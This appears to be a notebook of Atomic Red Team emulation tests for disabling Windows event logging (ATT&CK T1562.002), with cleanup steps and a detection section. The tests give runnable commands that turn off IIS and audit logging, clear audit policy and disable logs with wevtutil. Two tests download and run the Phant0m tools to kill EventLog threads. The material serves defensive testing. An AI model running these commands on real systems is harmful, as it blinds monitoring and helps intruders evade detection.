# T1562.002 - Disable Windows Event Logging
Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.

The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)

Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: <code>Stop-Service -Name EventLog</code>.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)

By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

## Atomic Tests

### Atomic Test #1 - Disable Windows IIS HTTP LoggingDisables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.

Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:true
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 1

#### Cleanup: 
```powershell
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
  C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:false *>$null
}
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Disable Windows IIS HTTP Logging via PowerShellDisables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.

Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
set-WebConfigurationProperty -PSPath "IIS:\Sites\Default Web Site\" -filter "system.webServer/httpLogging" -name dontLog -value $true
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 2

#### Cleanup: 
```powershell
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
  C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:false *>$null
}
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Kill Event Log Service ThreadsKill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
$output = "$env:TEMP\Invoke-Phant0m.ps1"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1
Invoke-Phant0m
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 3

#### Cleanup: 
```powershell
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Impair Windows Audit Log PolicyDisables the windows audit policy to prevent key host based telemetry being written into the event logs.
[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 4

#### Cleanup: 
```cmd
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Clear Windows Audit Policy ConfigClear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
auditpol /clear /y
auditpol /remove /allusers
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 5

#### Cleanup: 
```cmd
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 5 -Cleanup

### Atomic Test #6 - Disable Event Logging with wevtutilWevtutil can be used to disable logs. 
NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
wevtutil sl "Microsoft-Windows-IKE/Operational" /e:false
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 6

#### Cleanup: 
```cmd
wevtutil sl "Microsoft-Windows-IKE/Operational" /e:true
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Makes Eventlog blind with Phant0m
Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Phant0m.exe must exist on disk at specified location (#{file_name})

##### Check Prereq Commands:
```cmd
if (Test-Path PathToAtomicsFolder\T1562.002\bin\Phant0m.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path PathToAtomicsFolder\T1562.002\bin\Phant0m.exe) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "PathToAtomicsFolder\T1562.002\bin\Phant0m.exe" -UseBasicParsing

```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 7

#### Cleanup: 
```cmd
echo "Sorry you have to reboot"
```

In [ ]:
Invoke-AtomicTest T1562.002 -TestNumbers 7 -Cleanup

## Detection
Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)  

In Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.

Monitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)